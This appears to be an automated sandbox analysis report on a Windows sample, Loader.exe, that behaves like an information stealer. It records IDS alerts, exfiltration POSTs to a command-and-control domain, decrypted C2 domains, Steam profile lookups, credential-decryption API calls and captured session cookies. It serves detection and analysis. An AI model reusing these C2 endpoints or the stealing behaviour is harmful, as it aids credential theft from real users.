Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49705 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 92.122.104.90:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49703 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: areawannte.bet
Source: global traffic	HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=f4hWwb3UZDdWUI0VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14919Host: areawannte.bet
Source: global traffic	HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LJwwQDoyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15060Host: areawannte.bet
Source: global traffic	HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0Ds1NLRBlGdaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2640Host: areawannte.bet
Source: global traffic	HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0f4X3ec4wynUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588032Host: areawannte.bet
Source: global traffic	HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: areawannte.bet

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com

Source: Loader.exe	Virustotal: Detection: 69%			Perma Link
Source: Loader.exe	ReversingLabs: Detection: 76%

Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: defaulemot.run/jUSiaz
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: begindecafer.world/QwdZdf
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: garagedrootz.top/oPsoJAN
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: modelshiverd.icu/bJhnsj
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: arisechairedd.shop/JnsHY
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: catterjur.run/boSnzhu
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: orangemyther.live/IozZ
Source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	String decryptor: fostinjec.today/LksNAz

Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041F853 CryptUnprotectData,	1_2_0041F853
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041EB15 CryptUnprotectData,	1_2_0041EB15
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00420409 CryptUnprotectData,	1_2_00420409
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041EB15 CryptUnprotectData,	1_2_0041EB15

Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	1_2_0044D050
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	1_2_00448810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	1_2_0044E270
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41150A26h]	1_2_0040DA90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_0041EB15
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, eax	1_2_00420409
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]	1_2_00420409
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_00437C3B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 5F115B3Dh	1_2_0044DCE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+50h]	1_2_00444C80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+50h]	1_2_00444C80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-475591A2h]	1_2_00430560
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-66954A28h]	1_2_00430560
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+7Ch]	1_2_00438510
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-002B3584h]	1_2_0041AD30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-63AEBA9Ch]	1_2_00421670
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-63AEBAACh]	1_2_00421670
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [edi], cx	1_2_0042A850
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_00438055
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_0043806B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]	1_2_00433810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_0041F0E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3C0FFEB8h]	1_2_004468A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	1_2_0043215F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-669549ECh]	1_2_0043215F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [edx+eax]	1_2_0043215F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-04A90FF0h]	1_2_00445960
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2196A972h]	1_2_00449130
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0424B4BAh]	1_2_004379C1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_0041EB15
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	1_2_004019E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h]	1_2_004309F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov esi, ecx	1_2_00424980
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041D19D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	1_2_004321AE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-669549ECh]	1_2_004321AE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	1_2_0041F9BA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	1_2_00423A40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	1_2_00423A40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebp, eax	1_2_00408A70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041D27A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_00426A30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_0040A2F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_0040A2F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	1_2_00432288
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-669549ECh]	1_2_00432288
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	1_2_00432297
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	1_2_0042A370
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], edx	1_2_00436300
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	1_2_0041E333
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0424B4BAh]	1_2_004379BC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]	1_2_00433810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_004203F9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_0041AC70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00433400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], B7070F87h	1_2_004124CB
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push eax	1_2_00445CD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	1_2_0042DCF2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-66954A54h]	1_2_0042FC8D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-66954A54h]	1_2_0042FC8D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esi+08h], ecx	1_2_0041C4B2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp+4Ch]	1_2_0040F560
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	1_2_00429D30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	1_2_00429D30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ecx], al	1_2_004375F5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edx+ebx*8], 744E5843h	1_2_00448D90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	1_2_00412D99
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-2196A97Ah]	1_2_0040C630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	1_2_0040C630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [eax], cl	1_2_0040C630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	1_2_0044E6C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx eax, ax	1_2_0040BED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-66954AA0h]	1_2_004336E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+6E8E4488h]	1_2_00428680
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00428680
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041D6BE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041D6BE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041D6BE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041D6BE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push eax	1_2_00432742
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	1_2_00412F58
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	1_2_00423F60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-63AEBA9Ch]	1_2_0041CF02
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00441F00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00434720
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	1_2_004237C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+7ED98958h]	1_2_0042D790
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	1_2_004027A0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=Nonesessionid=6a624ee3cc9d62aa4cdece45; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35725Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 11 Mar 2025 00:14:24 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlu equals www.youtube.com (Youtube)
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=Nonesessionid=a7af2b6f248ea375b99b2be6; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35725Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 11 Mar 2025 00:14:15 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlu equals www.youtube.com (Youtube)
Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: d.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Loader.exe, 00000001.00000002.2478791044.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Loader.exe, 00000001.00000002.2478791044.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C1dd948cd7ff32d9bbd82fbd59380fba0; path=/; secure; HttpOnly; SameSite=Nonesessionid=43a79e744c633f9ed688b363; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26244Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 11 Mar 2025 00:14:06 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: defaulemot.run
Source: global traffic	DNS traffic detected: DNS query: begindecafer.world
Source: global traffic	DNS traffic detected: DNS query: garagedrootz.top
Source: global traffic	DNS traffic detected: DNS query: modelshiverd.icu
Source: global traffic	DNS traffic detected: DNS query: arisechairedd.shop
Source: global traffic	DNS traffic detected: DNS query: catterjur.run
Source: global traffic	DNS traffic detected: DNS query: orangemyther.live
Source: global traffic	DNS traffic detected: DNS query: fostinjec.today
Source: global traffic	DNS traffic detected: DNS query: sterpickced.digital
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: areawannte.bet

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_e9c6e3d09abbf9d687fdc99f29a13eb6babca2_a0bbbc24_3dc84f1d-f860-4fb2-8221-7aa48737b594\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1D3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2AF.tmp.WERInternalMetadata.xml

